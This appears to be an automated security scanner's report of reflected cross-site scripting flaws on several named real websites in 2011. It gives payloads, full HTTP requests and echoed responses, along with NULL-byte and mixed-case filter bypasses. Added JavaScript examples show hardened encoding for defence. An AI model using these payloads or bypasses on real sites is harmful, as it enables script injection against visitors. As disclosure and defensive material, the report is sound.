<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=2402d"style="x:expr/**/ession(alert(1))"942e8dd2de1"> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d764b"><script>alert(1)</script>ff6160e5949 was submitted in the from parameter. This input was echoed as d764b"><script>alert(1)</script>ff6160e5949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /password.do?from=%00d764b"><script>alert(1)</script>ff6160e5949 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:32 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 11441
<!-- forgottenPassword.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.d764b"><script>alert(1)</script>ff6160e5949"> ...[SNIP]...
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8a7"><script>alert(1)</script>e76a6b52e057de0cb was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d019"><script>alert(1)</script>c69c47f83fc5ae963 was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 was submitted in the from parameter. This input was echoed as 10afa"style="x:expression(alert(1))"6551a8508b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /sign-in.do?from=%0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:59 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 17147
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.10afa"style="x:expression(alert(1))"6551a8508b2"> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ec7"><script>alert(1)</script>c88b024cdae was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182e6"%3b566f826a9ff was submitted in the from parameter. This input was echoed as 182e6";566f826a9ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. A full proof-of-concept for the same parameter and sink is shown in the a8336 finding below, where ";alert(1)// was accepted and echoed with the semicolon decoded.
Request
GET /sign-in.do?from=182e6"%3b566f826a9ff HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:02 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16907
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="182e6";566f826a9ff"; //--> ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f8e</script>0cfb073a38a was submitted in the from parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to an HTML context (the HTML parser ends the script element at </script> regardless of JavaScript string quoting). An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sign-in.do?from=b6f8e</script>0cfb073a38a HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:44 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16963
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( 'b6f8e</script>0cfb073a38a' == '') { if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from'); if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8336"%3balert(1)//1decb9d5a21 was submitted in the from parameter. This input was echoed as a8336";alert(1)//1decb9d5a21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhousea8336";alert(1)//1decb9d5a21"; //--> ...[SNIP]...
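The three sign-in.do findings above (the 182e6 payload that terminates the rh_store string without executing anything, the b6f8e payload that closes the script element from inside a JavaScript string, and the a8336 payload that executes) all come from one sink: the from parameter concatenated into var rh_store="..."; inside an inline script. The same applies to the var error='...' finding on p.opt.fimserve.com further down. The following is an added example, not code from the report or from the site: a renderer that reproduces the vulnerable pattern next to a hardened one, each evaluated with a stub alert() so the difference is observable without a browser. The function names are assumptions; the payloads are copied from the findings.

```javascript
// Added example (not from the original report).  A vulnerable inline-script
// renderer modelled on  var rh_store="...";  beside a hardened one, and a
// harness that evaluates the generated script with alert() stubbed out.

// Hardened serialiser: emit a JSON string literal, then additionally escape
// the characters the HTML parser cares about (< > &) and the two line
// terminators JSON allows raw (U+2028/U+2029).  JSON.stringify already
// handles quotes, backslashes and control characters.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The pattern visible in the response: raw concatenation inside double quotes.
function renderStoreScriptVulnerable(from) {
  return 'var rh_store="' + from + '";';
}

// Same output shape, but the value can neither leave the string literal nor
// close the script element early with a "</script>" inside the value.
function renderStoreScriptSafe(from) {
  return 'var rh_store=' + jsStringLiteral(from) + ';';
}

// Evaluate the generated script the way the browser would once the script
// body has been parsed.  Returns { value, alerts, error }.
function evaluateStoreScript(script) {
  const alerts = [];
  const alert = (x) => alerts.push(x);
  try {
    // A newline before the return keeps it out of any injected "//" comment.
    const value = new Function('alert', script + '\nreturn rh_store;')(alert);
    return { value, alerts, error: null };
  } catch (e) {
    return { value: undefined, alerts, error: e.name };
  }
}

// Would the HTML parser see the end of the script element in this text?
// Case-insensitive; JavaScript string quoting is irrelevant to it.
function closesScriptElement(script) {
  return /<\/script/i.test(script);
}

// The three payloads from the report, as constructed inputs.
const PAYLOAD_TERMINATE = '182e6";566f826a9ff';
const PAYLOAD_EXEC = 'randomhousea8336";alert(1)//1decb9d5a21';
const PAYLOAD_CLOSE_TAG = 'b6f8e</script>0cfb073a38a';

function demoJsString() {
  return {
    // String terminated, but what follows is not valid JS: a SyntaxError, no execution.
    terminateVuln: evaluateStoreScript(renderStoreScriptVulnerable(PAYLOAD_TERMINATE)),
    // Full PoC: alert(1) runs and the trailing "; is commented out.
    execVuln: evaluateStoreScript(renderStoreScriptVulnerable(PAYLOAD_EXEC)),
    // Hardened: the whole payload is just the value of rh_store.
    execSafe: evaluateStoreScript(renderStoreScriptSafe(PAYLOAD_EXEC)),
    // JSON.stringify alone still leaves </script> in the output; the extra
    // \u003c escaping is what removes it, and the value still round-trips.
    closeTagJsonOnly: closesScriptElement(JSON.stringify(PAYLOAD_CLOSE_TAG)),
    closeTagVuln: closesScriptElement(renderStoreScriptVulnerable(PAYLOAD_CLOSE_TAG)),
    closeTagSafe: closesScriptElement(renderStoreScriptSafe(PAYLOAD_CLOSE_TAG)),
    closeTagSafeValue: evaluateStoreScript(renderStoreScriptSafe(PAYLOAD_CLOSE_TAG)).value,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demoJsString(), null, 2));
}
```

The JSON-literal approach is preferable to backslash-escaping quotes by hand because it covers every quoting style at once (the p.opt.fimserve.com sink uses single quotes, the randomhouse one double quotes) and because the \u003c escaping is the only thing standing between a JSON-encoded value and an early </script>.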
The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a312"><script>alert(1)</script>2753c92f034 was submitted in the ht parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad.php?do=html&zid=14678&wd=728&ht=903a312"><script>alert(1)</script>2753c92f034&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1 Host: g.adspeed.net Proxy-Connection: keep-alive Referer: http://seclists.org/fulldisclosure/2011/Apr/388 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID" Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 21:51:52 GMT Server: AdSpeed/s10 Content-Length: 397
The value of the wd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c was submitted in the wd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request
GET /ad.php?do=html&zid=14678&wd=7287da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1 Host: g.adspeed.net Proxy-Connection: keep-alive Referer: http://seclists.org/fulldisclosure/2011/Apr/388 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID" Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 21:51:50 GMT Server: AdSpeed/s10 Content-Length: 397
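The from finding on ecommerce.randomhouse.com (a payload with no angle brackets at all closes the href quote and adds a style attribute) and the wd finding on g.adspeed.net (a case-sensitive check for "script" is bypassed by "ScRiPt") are the same lesson: a blacklist cannot protect an HTML attribute, contextual encoding can. The following is an added example, not code from the report or from either site. It models the randomhouse href sink, a naive blacklist of the kind the scanner reports bypassing (constructed for illustration, not the real filter), an attribute encoder, and a small tokeniser that shows where the browser would actually end the tag. Function names are assumptions; the payloads are copied from the findings.

```javascript
// Added example (not from the original report).  Why a blacklist fails in an
// HTML attribute context, and what replaces it.

// A naive, case-sensitive, tag-oriented blacklist.  Constructed for
// illustration; not the filter either site actually used.
function naiveBlacklist(value) {
  return value.includes('<script') ? '' : value;
}

// Correct defence for a double-quoted HTML attribute: turn the five
// characters that can change the parse into character references.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// The sink from the sign-in.do response: the value interpolated into a
// double-quoted href.  `filter` is whatever the app does before writing it.
function renderLink(from, filter) {
  return '<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=' +
    filter(from) + '">';
}

// Tokenise one start tag roughly the way an HTML parser does: collect the
// attribute names and return whatever text follows the tag's closing '>'.
// An attribute the template never had, or leftover text starting with '<',
// means the value escaped the href.
function tokeniseStartTag(html) {
  const names = [];
  let rest = '';
  let i = html.indexOf(' ') + 1;                 // skip the tag name
  while (i < html.length) {
    const c = html[i];
    if (c === '>') { rest = html.slice(i + 1); break; }
    if (/\s/.test(c)) { i++; continue; }
    let name = '';                               // attribute name state
    while (i < html.length && !/[\s=>]/.test(html[i])) name += html[i++];
    names.push(name.toLowerCase());
    while (i < html.length && /\s/.test(html[i])) i++;
    if (html[i] === '=') {                       // attribute value
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      if (html[i] === '"') {                     // quoted: runs to the next "
        const end = html.indexOf('"', i + 1);
        i = end === -1 ? html.length : end + 1;  // no whitespace required after it
      } else {                                   // unquoted: runs to space or >
        while (i < html.length && !/[\s>]/.test(html[i])) i++;
      }
    }
  }
  return { names, rest };
}

// Payloads from the report, as constructed inputs.
const PAYLOAD_STYLE = '10afa"style="x:expression(alert(1))"6551a8508b2';
const PAYLOAD_SCRIPT = 'd3ec7"><script>alert(1)</script>c88b024cdae';
const PAYLOAD_MIXED_CASE = '7da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c';

const identity = (v) => v;

function demoAttribute() {
  return {
    rawStyle: tokeniseStartTag(renderLink(PAYLOAD_STYLE, identity)),
    rawScript: tokeniseStartTag(renderLink(PAYLOAD_SCRIPT, identity)),
    blacklistScript: tokeniseStartTag(renderLink(PAYLOAD_SCRIPT, naiveBlacklist)),
    blacklistMixedCase: tokeniseStartTag(renderLink(PAYLOAD_MIXED_CASE, naiveBlacklist)),
    blacklistStyle: tokeniseStartTag(renderLink(PAYLOAD_STYLE, naiveBlacklist)),
    encodedStyle: tokeniseStartTag(renderLink(PAYLOAD_STYLE, encodeForHtmlAttribute)),
    encodedMixedCase: tokeniseStartTag(renderLink(PAYLOAD_MIXED_CASE, encodeForHtmlAttribute)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demoAttribute(), null, 2));
}
```

The blacklist blocks the lowercase payload only by destroying the value, lets the mixed-case and style payloads straight through, and would need a new entry for every handler name and casing; the encoder leaves the tokeniser with exactly the two attributes the template had, whatever the input.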
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09e"><script>alert(1)</script>f7c22091cea was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D8b09e"><script>alert(1)</script>f7c22091cea&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4679e"-alert(1)-"a62aee2375a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D4679e"-alert(1)-"a62aee2375a&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 403aa"%3balert(1)//7cc5d18bab was submitted in the mpvc parameter. This input was echoed as 403aa";alert(1)//7cc5d18bab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=403aa"%3balert(1)//7cc5d18bab HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddc4"><script>alert(1)</script>a6ede4c7b5 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=5ddc4"><script>alert(1)</script>a6ede4c7b5 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c479"-alert(1)-"d9e31151018 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bec5d"%3balert(1)//31de559e8c0 was submitted in the mpvc parameter. This input was echoed as bec5d";alert(1)//31de559e8c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D4926950&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3fbec5d"%3balert(1)//31de559e8c0 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f5a"><script>alert(1)</script>563f308447c was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a137c"><script>alert(1)</script>2f85ada7e43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec10"><script>alert(1)</script>f83538fe8fc was submitted in the opt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f6c"><script>alert(1)</script>3cb59412b55 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 879db<script>alert(1)</script>cb5517fdab7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /geosearch/service/json/getByCode/salesCity?code=BOS&callback=dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7 HTTP/1.1 Host: matrix.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.10.10.1303847753
